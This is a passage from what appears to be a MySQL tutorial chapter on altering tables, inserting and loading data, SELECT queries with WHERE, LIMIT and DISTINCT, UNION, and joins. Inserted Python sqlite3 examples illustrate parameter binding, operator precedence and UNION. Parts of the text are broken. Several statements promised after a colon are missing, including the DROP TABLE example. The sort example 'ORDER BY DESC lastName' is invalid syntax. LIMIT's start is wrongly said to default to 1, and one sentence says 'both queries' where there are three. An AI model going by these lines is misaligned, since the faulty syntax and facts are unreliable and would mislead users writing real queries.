the statement doesn’t create it but also doesn’t return an error message. 

You can create a new table that’s an exact copy, with the same structure, of 
an existing table, as follows: 

CREATE TABLE tablename LIKE oldtablename 

The new table, tablename, is created with the same fields and definitions 
as oldtablename. Even if the old table contains data, the new table doesn’t 
include that data, just the structure. 

After you create a table, you can query to see it, review its structure, or 
remove it. 

♦ To see the tables that have been added to a database, use this query: 

SHOW TABLES 

♦ To see the structure of a table, use this query: 

EXPLAIN tablename 

Removing a table

You can remove a table, whether it’s empty or contains data. Be sure you 
want to remove a table before you do it. 

Removing a table is irreversible. After you drop a table, that table is gone 
forever. And any data that was in it is gone, as well. 

To remove any table, use this statement: 

Changing the Database Structure

Your database isn’t written in stone. You can change the name of any table; 
add, drop, or rename a column in any table; or change the data type or other 
attributes of any column. 

Changing a database is not a rare occurrence. You might want to change 
your database for many reasons. For example, suppose that you defined the 
column lastName with VARCHAR(20) in a database that contains the names 
of all the employees in your company. At the time, 20 characters seemed 
sufficient for a last name. But you just received a memo announcing the new 
CEO, John Schwartzheimer-Losertman. Oops. MySQL will truncate his name 
to the first 20 letters, Schwartzheimer-Loser — a less-than-desirable new 
name for the boss. So you need to make the column wider — pronto. 

You can change the database structure with an ALTER statement. The basic 
format for this statement is ALTER TABLE tablename, followed by the 
specified changes. Table 3-7 shows the changes that you can make. 


Table 3-7 Changes You Can Make with the ALTER Statement 

Change                                        Description
ADD columnname definition                     Adds a column; definition includes the data type
                                              and optional definitions.
ALTER columnname SET DEFAULT value            Changes the default value for a column.
ALTER columnname DROP DEFAULT                 Removes the default value for a column.
CHANGE columnname newcolumnname definition    Changes the definition of a column and renames the
                                              column; definition includes the data type and
                                              optional definitions.
DROP columnname                               Deletes a column, including all the data in that
                                              column. The data can't be recovered.
MODIFY columnname definition                  Changes the definition of a column; definition
                                              includes the data type and optional definitions.
RENAME newtablename                           Renames a table.

For example, the following statement renames the Customer table to 
NewCustomer: 

ALTER TABLE Customer RENAME NewCustomer 

For another example, the following statement changes the specified column 
(lastName) to the specified data type (VARCHAR) and width (50): 

ALTER TABLE Customer MODIFY lastName VARCHAR(50) 

In This Chapter 

Storing data in the database 

Viewing and retrieving data from the database 

Updating data 

Deleting data 


An empty database is like an empty cookie jar — you get nothing out of 
it. And searching an empty database is no more interesting or fruitful 
than searching an empty cookie jar. A database is useful only with respect 
to the information that it holds. 


A database needs to be able to receive information for storage and to deliver 
information on request. For instance, the CustomerOrderInformation 
database described in earlier chapters needs to be able to receive the 
customer and order information, and it needs to be able to deliver its stored 
information when you request it. If you want to know the address of a 
particular customer or the date a particular order was made, for example, the 
database needs to deliver that information when you request it. 

Your MySQL database responds to four types of requests: 

♦ Adding information: Adding a row to a table. 

♦ Retrieving information: Looking at the data. This request does not 
remove data from the database. 

♦ Updating information: Changing information in an existing row. This 
includes adding data to a blank field in an existing row. 

♦ Removing information: Deleting data from the database. 

You interact with the database through SQL statements and queries, as 
discussed in Chapter 1 of this minibook. This chapter explains how to use SQL 
statements and queries to add, view, retrieve, update, and delete information 
in your database. 

Adding Information to a Database 

Every database needs data. For example, you might want to add data to your 
database so that your users can look at it. Or you might want to create an 
empty database for users to put data into. In either scenario, data is added 
to the database. 

If your data is still on paper, you can enter it directly into a MySQL database, 
one row at a time, in an SQL statement. However, if you have a lot of data, 
this process could be tedious and involve a lot of typing. Suppose that you 
have information on 1,000 products that must be added to your database. 
Assuming that you’re greased lightning on a keyboard and can enter a row 
per minute, that’s 16 hours of rapid typing — well, rapid editing, anyway. 
Doable, but not fun. On the other hand, suppose that you need to enter 5,000 
members of an organization into a database and that it takes five minutes to 
enter each member. Now you’re looking at more than 400 hours of typing — 
who has time for that? 


If you have a large amount of data to enter, consider some alternatives. 
Sometimes scanning in the data is an option. Or perhaps you need to beg, 
borrow, or hire some help. In many cases, it might be faster to enter the data 
into a big text file than to enter each row in a separate SQL statement. 

The SQL statement LOAD can read data from a big text file (or even a small 
text file). So, if your data is already in a computer file, you can work with 
that file; you don’t need to type all the data again. Even if the data is in a 
format other than a text file (for example, in an Excel, Access, or Oracle file), 
you can usually convert the file to a text file, which can then be read into 
your MySQL database. If the data isn’t yet in a computer file and there’s a lot 
of data, it might be faster to enter that data into the computer in a text file 
and transfer it into MySQL as a second step. 

Most text files can be read into MySQL, but some formats are easier to read 
than others. If you’re planning to enter the data into a text file, read the 
section, “Adding a bunch of data,” to find the best format. Of course, if the data 
is already on the computer, you have to work with the file as it is. 


Adding one row at a time 

If you have a small amount of data, you can add one row at a time to the 
table. PHP scripts often need to add one row at a time. For instance, when 
a PHP script accepts the data from a customer in a form, it usually needs to 
enter the information for the customer into the database in a new row. 

You use the INSERT statement to add a row to a database. This statement 
tells MySQL which table to add the row to and what the values are for the 
fields in the row. The general form of the statement is 

INSERT INTO tablename (columnname, columnname,...,columnname) 
VALUES (value, value,...,value) 

The following rules apply to the INSERT statement: 

♦ Values must be listed in the same order in which the column names 
are listed. The first value in the value list is inserted into the column 
that’s named first in the column list; the second value in the value list is 
inserted into the column that’s named second; and so on. 

♦ A column list, full or partial, is allowed. You don’t need to list all the 
columns. Columns that aren’t listed are given their default value or left 
blank if no default value is defined. 

Remember, any columns that are defined as NOT NULL must be 
included, with values, or the statement will fail. 

♦ A column list is not required. If you’re entering values for all the columns, 
you don’t need to list the columns at all. If no columns are listed, MySQL 
looks for values for all the columns, in the order in which they appear in 
the table. 

♦ The column list and value list must be the same. You must provide a 
value for every column that you list or you’ll get an error message like 
this: Column count doesn't match value count. 

The following INSERT statement adds a row to the Customer table: 

INSERT INTO Customer (lastName, street,city,state,zip, 
email,phone,fax) 
VALUES ("Contrary","1234 Garden St","Garden","NV","88888", 
"maryc@hergarden.com","(555) 555-5555", "") 

Notice that firstName isn’t listed in the column name list. No value is 
entered into the firstName field. If firstName were defined as NOT NULL, 
MySQL would not allow this. Also, if the definition for firstName included a 
default, the default value would be entered, but because it doesn’t, the field 
is left empty. Notice that the value stored for fax is an empty string. 
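
The INSERT rules above, run as an added example (not code from the book): values are passed as bound parameters, the form a script should use when the data comes from a customer's form. It uses Python's built-in sqlite3 module with an in-memory SQLite database as a stand-in for MySQL; the cut-down Customer table, the helper names, and the sample values are assumptions made for the illustration.

```python
import sqlite3

# Cut-down Customer table (assumed definition, constructed for this example).
SCHEMA = """
CREATE TABLE Customer (
    customerID INTEGER PRIMARY KEY AUTOINCREMENT,
    lastName   TEXT NOT NULL,          -- must always be supplied
    firstName  TEXT,                   -- no default: left empty when omitted
    state      TEXT DEFAULT 'NV',      -- default is used when omitted
    email      TEXT
)"""


def make_db():
    """Return an in-memory SQLite database holding an empty Customer table."""
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    return db


def add_customer(db, form):
    """Insert one row from submitted form fields and return its customerID.

    The column list is fixed in the statement text. Only the values come
    from the form, and they are bound to the ? placeholders, so a quote
    character in a value is stored as data instead of ending the string.
    """
    cur = db.execute(
        "INSERT INTO Customer (lastName, email) VALUES (?, ?)",
        (form["lastName"], form["email"]),
    )
    db.commit()
    return cur.lastrowid


def try_insert(db, sql, params):
    """Run an INSERT; return 'ok' or the name of the error class raised."""
    try:
        db.execute(sql, params)
        return "ok"
    except sqlite3.Error as exc:
        return type(exc).__name__


def fetch_customer(db, customer_id):
    """Return (lastName, firstName, state, email) for one customerID."""
    return db.execute(
        "SELECT lastName, firstName, state, email FROM Customer "
        "WHERE customerID = ?",
        (customer_id,),
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    # Constructed form input; the apostrophe would break a hand-quoted string.
    new_id = add_customer(db, {"lastName": "O'Contrary",
                               "email": "maryc@hergarden.com"})
    print(fetch_customer(db, new_id))
    # A NOT NULL column left out of the column list: the statement fails.
    print(try_insert(db, "INSERT INTO Customer (email) VALUES (?)",
                     ("jack@example.com",)))
    # Two columns listed but one value supplied: the counts don't match.
    print(try_insert(db, "INSERT INTO Customer (lastName, email) VALUES (?)",
                     ("Sprat",)))
```
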

To look at the data that you entered and ensure that you entered it correctly, 
use an SQL query that retrieves data from the database. We describe these 
SQL queries in detail in the “Retrieving Information from a Database” section, 
later in this chapter. In brief, the following query retrieves all the data in the 
Customer table: 

Adding a bunch of data 

If you have a large amount of data to enter and it’s already in a computer 
file, you can transfer the data from the existing computer file to your MySQL 
database. 


Because data in a database is organized in rows and columns, the text file 
being read must indicate where the data for each column begins and ends 
and where the end of a row is. Here’s how you create that table structure: 

♦ Columns: To indicate columns, a specific character separates the data 
for each column. By default, MySQL looks for a tab character to separate 
the fields. However, if a tab doesn’t work for your data file, you can 
choose a different character to separate the fields and tell MySQL that a 
different character than the tab separates the fields. 

♦ Rows: Also by default, the end of a line is expected to be the end of a 
row — although you can choose a character to indicate the end of a line 
if you need to. A data file for an inventory table might look like this: 

Rock<TAB>Classic<TAB>Steely Dan<TAB>Aja<TAB>10.99 
Rock<TAB>Pop<TAB>Semisonic<TAB>All About Chemistry<TAB>11.99 
Rock<TAB>Classic<TAB>Beatles<TAB>Abbey Road<TAB>9.99 


A data file with tabs between the fields is a tab-delimited file. Another common 
format is a comma-delimited file, where commas separate the fields. If your 
data is in another file format, you need to convert it into a delimited file. 



To convert data in another software’s file format into a delimited file, check 
the manual for that software or talk to your local expert who understands 
the data’s current format. Many programs, such as Excel, Access, and Oracle, 
allow you to output the data into a delimited file. For a text file, you might be 
able to convert it to delimited format by using the search-and-replace function 
of an editor or word processor. For a truly troublesome file, you might need 
to seek the help of an expert or a more experienced programmer. 


You can leave a field blank in the data file by including the field separators 
with no data between them. If the field is not defined as NOT NULL, the field 
is blank. If the field is defined as NOT NULL, loading the data file fails and an 
error message is returned. If one of the fields is an AUTO_INCREMENT field, 
such as a SERIAL field, you can leave it blank and MySQL will insert the 
AUTO_INCREMENT value. For instance, the following data file contains data 
to be loaded into the Customer table. 

,Smith,John,,Austin,TX,88888,,, 
,Contrary,Mary,,Garden,ID,99999,,, 
,Sprat,Jack,,Pumpkin,NY,11111,,, 

This data file is comma delimited. Each row starts with a comma, leaving the 
first field blank for the customerID field, which is SERIAL. Other fields in 
the row are also blank and will be blank in the database after the data file is 
loaded. 

The SQL statement that reads data from a text file is LOAD. The basic form of 
the LOAD statement is 

LOAD DATA INFILE "path/datafilename" INTO TABLE tablename 

The statement loads data from a text file located on your server. If the 
filename doesn’t include a path, MySQL looks for the data file in the directory 
where your table definition file, called tablename.frm, is located. By 
default, this file is located in a directory named for your database, such as a 
directory named CustomerOrderInformation. This directory is located 
in your data directory, which is located in the main directory where MySQL 
is installed. For example, if the file was named data.dat, the LOAD statement 
might look for the file at C:\Program Files\MySQL\MySQL Server 
5.0\data\CustomerOrderInformation\data.dat. 

The basic form of the LOAD statement can be followed by optional phrases if 
you want to change a default delimiter. The options are 

FIELDS TERMINATED BY 'character' 

FIELDS ENCLOSED BY 'character' 

LINES TERMINATED BY 'character' 

Suppose that you have the data file for the Customer table, except that the 
fields are separated by a comma rather than a tab. The name of the data file 
is customer.dat, and it’s located in the same directory as the database. 
The SQL statement to read the data into the table is 

LOAD DATA INFILE "customer.dat" INTO TABLE Customer 
FIELDS TERMINATED BY ',' 

To use the LOAD DATA INFILE statement, the MySQL account must have 
the FILE privilege on the server host. We discuss MySQL account privileges 
in Chapter 2 of this minibook. 

You can also load data from a text file on your local computer by using the 
word LOCAL, as follows: 

LOAD DATA LOCAL INFILE "path/datafilename" 
INTO TABLE tablename 

You must include a path to the file. Use forward slashes for the path, even 
on a Windows computer, such as "C:/data/datafile1.txt". If you get 
an error message when sending this statement, LOCAL might not be enabled. 
See http://dev.mysql.com/doc/refman/5.1/en/load-data.html 
for more information on the LOCAL keyword. 

To look at the data that you loaded — to make sure that it’s correct — use 
an SQL query that retrieves data from the database. We describe these types 
of SQL queries in detail in the next section. In brief, use the following query 
to look at all the data in the table so that you can check it: 

SELECT * FROM Customer 


Looking at the Data in a Database 

After data has been entered into a database, you might want to browse 
through the data to see whether the entered data looks correct or to get an 
idea of what type of data is in the database. You can also browse the data 
to determine simple information about the database, such as how many 
records it contains. 

You can see all the data in a table with the following query: 

SELECT * FROM tablename 

This query gets all the data from a table. You can find out how many records 
are in the table and get a general idea of the data by browsing the output. 

You can see exactly how many records are in a table with the following query: 

SELECT COUNT(*) FROM tablename 

This query outputs the number of records contained in the table. 


Retrieving Information from a Database 

The only purpose in storing information is to have it available when you 
need it. A database lives to answer questions. What products are for sale? 
Who are the customers? How many customers live in Indiana? What do the 
customers buy? 

Many questions are answered by retrieving data from the database. For 
instance, to find out how many customers live in Indiana, you can retrieve all 
customer records where the field named state contains IN. Very often, you 
ask these kinds of questions in a PHP script and display the answer in a web 
page. In a PHP script, you might retrieve all the records for Indiana customers 
and display a list of their names and addresses on a web page. 

To answer specific questions, you use the SELECT query. You can ask precise, 
complex, and detailed questions with a SELECT query. The simplest SELECT 
query is 

SELECT * FROM tablename 

This query retrieves all the information from the table. The asterisk (*) is a 
wildcard meaning all the columns. 

The SELECT query can be much more selective. SQL words and phrases in the 
SELECT query can pinpoint the information needed to answer your question. 
Here are some tricks you can make the SELECT query perform: 

♦ You can request only the information (the columns) that you need to 
answer your question. For instance, you can request only the first and 
last names to create a list of customers. 

♦ You can request information in a particular order. For instance, you 
can request that the information be sorted in alphabetical order. 

♦ You can request information from selected objects (the rows) in your 
table. For instance, you can request the first and last names for only 
those customers whose addresses are in Florida. 

We tell you how to use these types of queries in the text that follows. 

In MySQL 4.1, MySQL added the capability to nest a SELECT query inside 
another query. The nested query is called a subquery. You can use a subquery 
in SELECT, INSERT, UPDATE, or DELETE statements or in SET clauses. A 
subquery can return a single value, a single row or column, or a table, which 
is used in the outer query. All the features of SELECT queries can be used 
in subqueries. See the MySQL online manual at 
http://dev.mysql.com/doc/refman/5.5/en/subqueries.html for detailed 
information on using subqueries. 

Retrieving specific information 

To retrieve specific information, list the columns containing the information 
you want. For example: 

SELECT columnname,columnname,columnname,... FROM tablename 

This query retrieves the values from all the rows for the indicated 
column(s). For instance, the following query retrieves all the last names 
and first names from the lastName and firstName columns stored in the 
Customer table: 

SELECT lastName,firstName FROM Customer 

You can perform mathematical operations on columns when you select 
them. For example, you can use the following SELECT query to add two 
columns: 

Or you could use the following query: 

SELECT price,price*1.08 FROM Inventory 

The result is the price and the price with the sales tax of 8 percent added. 
You can change the name of a column when selecting it, as follows: 

SELECT price,price*1.08 AS priceWithTax FROM Inventory 

The AS clause tells MySQL to give the name priceWithTax to the second 
column retrieved. Thus, the query retrieves two columns of data: price and 
priceWithTax. 

In some cases, you don’t want to see the values in a column, but you want 
to know something about the column. For instance, you might want to know 
the lowest or highest value in the column. Table 4-1 lists some of the 
information that is available about a column. 


Table 4-1 Information That Can Be Selected 

SQL Format           Description of Information
AVG(columnname)      Returns the average of all the values in columnname
COUNT(columnname)    Returns the number of rows in which columnname is not blank
MAX(columnname)      Returns the largest value in columnname
MIN(columnname)      Returns the smallest value in columnname
SUM(columnname)      Returns the sum of all the values in columnname


For example, the query to find out the highest price in an inventory table is 

SELECT MAX(price) FROM Inventory 

SQL words that look like MAX() and SUM(), with parentheses following the 
name, are functions. SQL provides many functions in addition to those in 
Table 4-1. Some functions, like those in Table 4-1, provide information about 
a column. Other functions change each value selected. For example, SQRT() 
returns the square root of each value in the column, and DAYNAME() returns 
the name of the day of the week for each value in a date column, rather than 
the actual date stored in the column. More than 100 functions are available 
for use in a SELECT query. For descriptions of all the functions, see the 
MySQL online manual at 
http://dev.mysql.com/doc/refman/5.5/en/functions.html. 

Retrieving data in a specific order 

You might want to retrieve data in a particular order. For instance, in the 
Customer table, you might want customers organized in alphabetical order 
by last name. Or, in the Inventory table, you might want the various 
products grouped by category. 

In a SELECT query, ORDER BY and GROUP BY affect the order in which the 
data is delivered to you: 

♦ ORDER BY: To sort information, add this phrase to your SELECT query: 

ORDER BY columnname 

The data is sorted by columnname in ascending order. For instance, if 
columnname is lastName, the data is delivered to you in alphabetical 
order by the last name. 

You can sort in descending order by adding DESC before the column 
name. For example: 

SELECT * FROM Customers ORDER BY DESC lastName 

♦ GROUP BY: To group information, use the following phrase: 

GROUP BY columnname 

The rows that have the same value of columnname are grouped 
together. For example, use this query to group the rows that have the 
same value as Category: 

SELECT * FROM Inventory GROUP BY Category 

You can use GROUP BY and ORDER BY in the same query. 

Retrieving data from specific rows 

Frequently, you don’t want all the information from a table. You want 
information only from selected rows. Three SQL words are frequently used to 
specify the source of the information: 

♦ WHERE: Allows you to request information from database objects with 
certain characteristics. For instance, you can request the names of 
customers who live in California, or you can list only products that are a 
certain category of clothes. 

♦ LIMIT: Allows you to limit the number of rows from which information 
is retrieved. For instance, you can request the information from only the 
first three rows in the table. 

♦ DISTINCT: Allows you to request information from only one row of 
identical rows. For instance, in a Login table, you can request loginName 
but specify no duplicate names, thus limiting the response to one record 
for each member. This would answer the question, “Has the customer 
ever logged in?” rather than the question “How many times has the 
customer logged in?” 

Using a WHERE clause 

The WHERE clause of the SELECT query enables you to make complicated 
selections. For instance, suppose your boss wants to know all the customers 
whose last names begin with B, who live in Indianapolis, and who have 
an 8 in either their phone or fax number. (We’re sure there are many uses 
for such a list.) You can get this list for your boss in a SELECT query with a 
WHERE clause. 

The basic format of the WHERE clause is 

WHERE expression AND|OR expression AND|OR expression ... 

expression specifies a value to compare with the values stored in the 
database. Only the rows containing a match for the expression are selected. You 
can use as many expressions as needed, each one separated by AND or OR. 
When you use AND, both of the expressions connected by the AND (that is, 
both the expression before the AND and the expression after the AND) must 
be true in order for the row to be selected. When you use OR, only one of the 
expressions connected by the OR must be true for the row to be selected. 

Some common expressions are shown in Table 4-2. 


Table 4-2 Expressions for the WHERE Clause 

Expression                           Example                            Result
column = value                       zip="12345"                        Selects only the rows where 12345 is stored in the column named zip
column > value                       zip > "50000"                      Selects only the rows where the ZIP code is 50001 or higher
column >= value                      zip >= "50000"                     Selects only the rows where the ZIP code is 50000 or higher
column < value                       zip < "50000"                      Selects only the rows where the ZIP code is 49999 or lower
column <= value                      zip <= "50000"                     Selects only the rows where the ZIP code is 50000 or lower
column BETWEEN value1 AND value2     zip BETWEEN "20000" AND "30000"    Selects only the rows where the ZIP code is greater than 19999 but less than 30001
column IN (value1, value2,...)       zip IN ("90001","30044")           Selects only the rows where the ZIP code is 90001 or 30044
column NOT IN (value1, value2,...)   zip NOT IN ("90001","30044")       Selects only the rows where the ZIP code is any ZIP code except 90001 or 30044
column LIKE value                    zip LIKE "9%"                      Selects all rows where the ZIP code begins with 9
column NOT LIKE value                zip NOT LIKE "9%"                  Selects all rows where the ZIP code doesn't begin with 9

Note: In LIKE and NOT LIKE expressions, value can contain the wildcards 
% (which matches any string) and _ (which matches any character). 

You can combine any of the expressions in Table 4-2 with ANDs and ORs. In 
some cases, you need to use parentheses to clarify the selection criteria. For 
instance, you can use the following query to answer your boss’s urgent need 
to find all customers whose names begin with B, who live in Indianapolis, 
and who have an 8 in either their phone or fax number: 

SELECT lastName,firstName FROM Customer 
WHERE lastName LIKE "B%" 
AND city = "Indianapolis" 
AND (phone LIKE "%8%" OR fax LIKE "%8%") 

Notice the parentheses in the last line. You wouldn’t get the results that 
you asked for without the parentheses. Without the parentheses, each 
connector would be processed in order from the first to the last, resulting in 
a list that includes all customers whose names begin with B and who live 
in Indianapolis and whose phone numbers have an 8 in them and all 
customers whose fax numbers have an 8 in them, whether or not they live in 
Indianapolis and whether or not their name begins with a B. When the last 
OR is processed, customers are selected whose characteristics match the 
expression before the OR or the expression after the OR. The expression 
before the OR is connected to previous expressions by the previous ANDs, 
and so it doesn’t stand alone, but the expression after the OR does stand 
alone, resulting in the selection of all customers with an 8 in their fax number. 
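
The effect of those parentheses, shown as an added example (not from the book): the boss's query is run with and without them against five constructed customer rows, using Python's built-in sqlite3 module and an in-memory SQLite database as a stand-in for MySQL. The cut-down Customer table, the helper names, and the rows are assumptions made for the illustration; AND binds more tightly than OR in both databases.

```python
import sqlite3

# Constructed rows: (lastName, firstName, city, phone, fax)
SAMPLE_CUSTOMERS = [
    ("Baker", "Ann", "Indianapolis", "555-8123", "555-0000"),  # B, Indy, 8 in phone
    ("Bell",  "Cal", "Indianapolis", "555-1111", "555-0080"),  # B, Indy, 8 in fax
    ("Brown", "Bob", "Indianapolis", "555-1234", "555-1111"),  # B, Indy, no 8
    ("Jones", "Eve", "Indianapolis", "555-8888", "555-1111"),  # not B, 8 in phone
    ("Smith", "Dee", "Austin",       "555-1111", "555-8888"),  # not B, not Indy, 8 in fax
]

WITH_PARENS = """
SELECT lastName FROM Customer
WHERE lastName LIKE ?
  AND city = ?
  AND (phone LIKE ? OR fax LIKE ?)
ORDER BY lastName"""

# Same text with the parentheses removed. AND is evaluated before OR, so this
# now means (name AND city AND phone) OR fax.
WITHOUT_PARENS = """
SELECT lastName FROM Customer
WHERE lastName LIKE ?
  AND city = ?
  AND phone LIKE ? OR fax LIKE ?
ORDER BY lastName"""

# The search values are bound as parameters, not pasted into the SQL text.
CRITERIA = ("B%", "Indianapolis", "%8%", "%8%")


def load_customers():
    """Return an in-memory database holding the constructed Customer rows."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE Customer "
        "(lastName TEXT, firstName TEXT, city TEXT, phone TEXT, fax TEXT)"
    )
    db.executemany("INSERT INTO Customer VALUES (?, ?, ?, ?, ?)",
                   SAMPLE_CUSTOMERS)
    return db


def last_names(db, sql):
    """Run one of the two queries and return the selected last names."""
    return [row[0] for row in db.execute(sql, CRITERIA)]


def unintended_rows(db):
    """Last names returned only because the parentheses are missing."""
    intended = set(last_names(db, WITH_PARENS))
    return [n for n in last_names(db, WITHOUT_PARENS) if n not in intended]


if __name__ == "__main__":
    db = load_customers()
    print("with parentheses:   ", last_names(db, WITH_PARENS))
    print("without parentheses:", last_names(db, WITHOUT_PARENS))
    print("unintended rows:    ", unintended_rows(db))
```
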

Using the LIMIT keyword 

LIMIT specifies how many rows can be returned. The form for LIMIT is 

LIMIT startnumber,numberofrows 

The first row that you want to retrieve is startnumber, and the number 
of rows to retrieve is numberofrows. If startnumber is not specified, 1 is 
assumed. To select only the first three customers who live in Texas, use this 
query: 

SELECT * FROM Customer WHERE state="TX" LIMIT 3 

Using the DISTINCT keyword 

Rows in the table can have identical values in one or more columns. However, 
in some cases, when you select a column, you don’t want to retrieve multiple 
rows with identical values. You want to retrieve the value only once. For 
example, suppose you have a table of products with one field called Category. 
The data undoubtedly contains many products in each category. Now 
suppose you want to display a list of all the categories available in the database. 
You want this list to contain each category listed only once. The keyword 
DISTINCT is provided for this purpose. 

To prevent a SELECT query from returning all identical records, add the 
keyword DISTINCT immediately after SELECT, as follows: 

SELECT DISTINCT Category FROM Product 

Combining information from more than one table 

In previous sections of this chapter, we assume that all the information you 
want is in a single table. However, you might want to combine information 
from different tables. You can do this easily in a single query. 

Sometimes your question requires information from more than one table. 
For instance, the question, “How many orders did customer Joe Smith place 
during the months of April and December?” requires information from 
multiple tables. You can ask this question easily in a single SELECT query by 
combining multiple tables. 

Two words can be used in a SELECT query to combine information from two 
or more tables: 

♦ UNION: Rows are retrieved from one or more tables and stored together, 
one after the other, in a single result. For example, if your query selected 
6 rows from one table and 5 rows from another table, the result would 
contain 11 rows. 

♦ JOIN: The tables are combined side by side, and the information is 
retrieved from both tables. 

UNION 

UNION is used to combine the results from two or more SELECT queries. The 
results from each query are added to the result set following the results of 
the previous query. The format of the UNION query is as follows: 

SELECT query UNION ALL SELECT query ... 

You can combine as many SELECT queries as you need. A SELECT query can 
include any valid SELECT format, including WHERE clauses, LIMIT clauses, 
and so on. The rules for the queries are 

♦ All the SELECT queries must select the same number of columns. 

♦ The columns selected in the queries must contain the same type of data. 

The result set contains all the rows from the first query, followed by all 
the rows from the second query, and so on. The column names used in the 
result set are the column names from the first SELECT query. 

The series of SELECT queries can select different columns from the same 
table, but situations in which you want a new table with one column in a 
table followed by another column from the same table are unusual. It’s much 
more likely that you want to combine columns from different tables. For 
example, you might have a table of members who have resigned from the 
club (OldMember) and a separate table of current members (Member). You 
can get a list of all members, both current and resigned, with the following 
query: 

SELECT lastName,firstName FROM Member UNION ALL 
SELECT lastName, firstName FROM OldMember 

The result of this query is the last and first names of all current members, 
followed by the last and first names of all the members who have resigned. 

Depending on how you organized your data, you might have duplicate 
names. For instance, perhaps a member resigned, and his name is in the 
OldMember table — but he joined again, so his name is added to the Member 
table. If you don’t want duplicates, don’t include the word ALL. If ALL is not 
included, duplicate lines aren’t added to the result. 

You can use ORDER BY with each SELECT query, as we discuss in the 
“Retrieving data in a specific order” section, earlier in this chapter, or you 
can use ORDER BY with a UNION query to sort all the rows in the result set. 

If you want ORDER BY to apply to the entire result set, rather than just to the 
query that it follows, use parentheses as follows: 

(SELECT lastName FROM Member UNION ALL 
SELECT lastName FROM OldMember) ORDER BY lastName 
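
UNION ALL, UNION, and a sort over the whole result, run as an added example (not from the book) on constructed Member and OldMember rows, using Python's built-in sqlite3 module and an in-memory SQLite database as a stand-in for MySQL. The memberID column, the helper names, and the rows are assumptions; the last query shows that UNION compares only the columns you select, so two different people who share a name collapse into one row unless an identifying column is selected too.

```python
import sqlite3

SETUP = """
CREATE TABLE Member    (memberID INTEGER, lastName TEXT, firstName TEXT);
CREATE TABLE OldMember (memberID INTEGER, lastName TEXT, firstName TEXT);
-- Constructed rows. Member 1 resigned and rejoined, so he is in both tables.
-- Members 7 and 5 are different people who happen to share a name.
INSERT INTO Member    VALUES (1, 'Smith', 'John'), (2, 'Sprat', 'Jack'),
                             (7, 'Contrary', 'Mary');
INSERT INTO OldMember VALUES (1, 'Smith', 'John'), (5, 'Contrary', 'Mary'),
                             (6, 'Adams', 'Zoe');
"""

# The book's MySQL form wraps the combined queries in parentheses. SQLite,
# used here, takes a trailing ORDER BY as applying to the whole result set,
# so the parentheses are left out.
ALL_ROWS = """
SELECT lastName, firstName FROM Member
UNION ALL
SELECT lastName, firstName FROM OldMember
ORDER BY lastName, firstName"""

# Without ALL, rows that are identical in every selected column appear once.
NO_DUPLICATES = """
SELECT lastName, firstName FROM Member
UNION
SELECT lastName, firstName FROM OldMember
ORDER BY lastName, firstName"""

# Selecting the identifying column keeps the two Mary Contrarys apart while
# still collapsing the rejoined member, whose rows match in every column.
BY_IDENTITY = """
SELECT memberID, lastName, firstName FROM Member
UNION
SELECT memberID, lastName, firstName FROM OldMember
ORDER BY lastName, firstName, memberID"""


def build_club():
    """Return an in-memory database holding the constructed member tables."""
    db = sqlite3.connect(":memory:")
    db.executescript(SETUP)
    return db


def run(db, sql):
    """Run a query and return its rows as a list of tuples."""
    return db.execute(sql).fetchall()


if __name__ == "__main__":
    db = build_club()
    for label, sql in (("UNION ALL", ALL_ROWS),
                       ("UNION", NO_DUPLICATES),
                       ("UNION with memberID", BY_IDENTITY)):
        rows = run(db, sql)
        print(f"{label}: {len(rows)} rows")
        for row in rows:
            print("   ", row)
```
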


Join 

Combining tables side by side is a join. Tables are combined by matching 
data in a column — the column that they have in common. The combined 
results table produced by a join contains all the columns from both tables. 
For instance, if table1 has two columns (memberID and height), and 
table2 has two columns (memberID and weight), a join results in a table 
with four columns: memberID (from table1), height, memberID (from 
table2), and weight. 

The two common types of joins are an inner join and an outer join. The 
difference between an inner and outer join is in the number of rows included in 
the results table. 

♦ Inner join: The results table produced by an inner join contains only 
rows that existed in both tables. 

♦ Outer join: The combined table produced by an outer join contains all 
rows that existed in one table with blanks in the columns for the rows 
that did not exist in the second table. 

For instance, if table1 contains a row for Joe and a row for Sally, and table2
contains only a row for Sally, an inner join would contain only one row: the 
row for Sally. However, an outer join would contain two rows — a row for 
Joe and a row for Sally — even though the row for Joe would have a blank 
field for weight. 

The results table for the outer join contains all the rows for one table. If any 
of the rows for that table don’t exist in the second table, the columns for the 
second table are empty. Clearly, the contents of the results table are
determined by which table contributes all its rows, requiring the second table
to match it. Two kinds of outer joins control which table sets the rows and
which must match: a left join and a right join.

You use different SELECT queries for an inner join and the two types of
outer joins. The following query is an inner join:

SELECT columnnamelist FROM table1,table2
WHERE table1.col2 = table2.col2

And these queries are outer joins:

SELECT columnnamelist FROM table1 LEFT JOIN table2
ON table1.col1=table2.col2

SELECT columnnamelist FROM table1 RIGHT JOIN table2
ON table1.col1=table2.col2

In all three queries, table1 and table2 are the tables to be joined. You can
join more than two tables. In both queries, col1 and col2 are the names of
the columns being matched to join the tables. The tables are matched based
on the data in these columns. These two columns can have the same name
or different names, but they must contain the same type of data.

As an example of inner and outer joins, consider a Clothes catalog with two 
tables. One table is Product, with the two columns Name and Type holding 
the following data: 

Name         Type
T-shirt      Shirt
Dress shirt  Shirt
Jeans        Pants

The second table is Color, with two columns Name and Color holding the 
following data: 

Name     Color
T-shirt  white
T-shirt  red
Loafer   black

You need to ask a question that requires information from both tables. If you 
do an inner join with the following query: 

SELECT * FROM Product,Color WHERE Product.Name = Color.Name 

you get the following results table with four columns: Name (from Product), 
Type, Name (from Color), and Color. 

Name     Type   Name     Color
T-shirt  Shirt  T-shirt  white
T-shirt  Shirt  T-shirt  red

Notice that only T-shirt appears in the results table — because only 
T-shirt was in both of the original tables, before the join. On the other 
hand, suppose you do a left outer join with the following query: 

SELECT * FROM Product LEFT JOIN Color
ON Product.Name=Color.Name


You get the following results table, with the same four columns — Name 
(from Product), Type, Name (from Color), and Color — but with different 
rows: 


Name         Type   Name     Color
T-shirt      Shirt  T-shirt  white
T-shirt      Shirt  T-shirt  red
Dress shirt  Shirt  <NULL>   <NULL>
Jeans        Pants  <NULL>   <NULL>


This table has four rows. It has the same first two rows as the inner join, but 
it has two additional rows — rows that are in the Product table on the left 
but not in the Color table. Notice that the columns from the table Color 
are blank for the last two rows. 


And, on the third hand, suppose that you do a right outer join with the 
following query: 

SELECT * FROM Product RIGHT JOIN Color
ON Product.Name=Color.Name


You get the following results table, with the same four columns, but with still 
